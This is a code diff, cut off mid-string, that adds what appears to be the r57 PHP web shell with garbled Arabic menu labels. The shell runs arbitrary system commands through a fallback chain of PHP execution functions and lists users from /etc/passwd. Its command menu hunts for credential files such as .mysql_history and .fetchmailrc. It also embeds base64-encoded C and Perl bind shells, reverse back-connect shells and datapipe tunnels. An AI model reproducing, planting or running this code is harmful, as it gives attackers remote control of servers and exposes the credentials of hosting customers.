+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .mysql_history'=>'find / -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .mysql_history İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .fetchmailrc'=>'find / -type f -name .fetchmailrc',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .fetchmailrc İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .fetchmailrc',
+'ÇÎÑ ãáİÇÊ ãÔÛáå İí ÇáäÙÇã'=>'lsattr -va',
+'ÑÄíÉ ÇáÈæÑÊÇÊ ÇáãİÊæÍÉ İí ÇáÓíÑİÑ'=>'netstat -an | grep -i listen',
+'ÑÄíÉ ÍÇáÉ ÇáãÌáÏÇÊ æÇãßÇäíÉ ÇáÊäİíĞ'=>'cat /etc/fstab',
+'ãÔÇåÏÉ ãáİ ÇááæŞ áÏÎæá ÇáÓí ÈÇäá æÇáãæÇŞÚ Úáì ÇáÓíÑİÑ'=>'cat /var/cpanel/accounting.log',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=tahoma size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
